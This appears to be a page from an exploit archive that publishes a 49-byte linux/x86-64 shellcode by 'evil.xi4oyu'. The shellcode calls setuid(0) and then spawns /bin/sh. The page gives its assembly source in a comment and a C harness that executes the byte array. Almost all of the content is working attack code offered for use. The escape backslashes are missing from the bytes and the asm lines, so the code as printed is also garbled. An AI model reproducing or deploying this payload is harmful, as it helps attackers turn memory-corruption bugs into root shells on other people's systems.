[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes
# Published : 2009-05-14
# Author : evil.xi4oyu
# Previous Title : freebsd/x86-64 execve /bin/sh shellcode 34 bytes
# Next Title : Serial port shell binding, busybox Launching shellcode
/*
setuid(0) + execve(/bin/sh) - just 4 fun.
xi4oyu [at] 80sec.com
main(){
__asm( "xorq %rdi,%rdint"
"mov $0x69,%alnt"
"syscall nt"
"xorq %rdx, %rdx nt"
"movq $0x68732f6e69622fff,%rbx; nt"
"shr $0x8, %rbx; nt"
"push %rbx; nt"
"movq %rsp,%rdi; nt"
"xorq %rax,%rax; nt"
"pushq %rax; nt"
"pushq %rdi; nt"
"movq %rsp,%rsi; nt"
"mov $0x3b,%al; nt"
"syscall ; nt"
"pushq $0x1 ; nt"
"pop %rdi ; nt"
"pushq $0x3c ; nt"
"pop %rax ; nt"
"syscall ; nt"
);
}
*/
main() {
char shellcode[] =
"x48x31xffxb0x69x0fx05x48x31xd2x48xbbxffx2fx62"
"x69x6ex2fx73x68x48xc1xebx08x53x48x89xe7x48x31"
"xc0x50x57x48x89xe6xb0x3bx0fx05x6ax01x5fx6ax3c"
"x58x0fx05";
(*(void (*)()) shellcode)();
}
2009-05-14
evil.xi4oyu
// www.Syue.com [2009-05-14]